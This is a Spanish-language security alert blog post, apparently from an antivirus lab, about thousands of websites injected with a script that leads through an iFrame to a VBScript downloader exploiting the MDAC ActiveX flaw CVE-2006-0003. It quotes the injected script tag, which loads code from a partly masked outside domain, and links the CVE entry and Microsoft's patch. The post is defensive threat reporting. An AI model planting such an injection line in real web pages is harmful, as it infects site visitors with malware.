Durante esta madrugada, nuestro laboratorio detectó otro caso donde varios miles de sitios web fueron modificados por atacantes para inyectar códigos maliciosos en sus páginas.

En esta oportunidad, se inyecta una línea como la siguiente en el sitio web vulnerable:

<script src=http://www.ch****.com/reg.js></script>

Ese archivo contiene código JavaScript que crea una etiqueta iFrame en el sitio web, la cual apunta a otro script, en este caso VBScript, que ESET NOD32 Antivirus detecta como VBS/TrojanDownloader.Iframe.NAA, que luego descarga otros tantos códigos maliciosos aprovechando una vulnerabilidad existente en el componente ActiveX de MDAC de Windows.

Esta vulnerabilidad está documentada en el siguiente enlace:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003

La misma puede ser parcheada con la actualización disponible aquí:

http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

La inyección de códigos maliciosos en sitios webs tradicionales, aprovechando vulnerabilidades en estos últimos, es una técnica cada vez más usada en estos días, como hemos reportado aquí en varias oportunidades.

Como siempre, recomendamos que mantengan sus antivirus actualizados y con las capacidades de detección heurística activadas a fin de mantenerse protegidos contra estas amenazas que aparecen a diario.

En cuanto a los administradores de sitios web, es importante que mantengan actualizado el software que utilizan tanto para su servidor como el sitio en si mismo, y que apliquen prácticas de programación segura para evitar las inyecciones de código.

Franco

Promedio: 5

• Drive-by-Download
• Radio online infecta usuarios a través de script dañino
• Seminario en UTN Regional Venado Tuerto

Categorias: Alertas, Malware, Vulnerabilidades
4 Comentarios »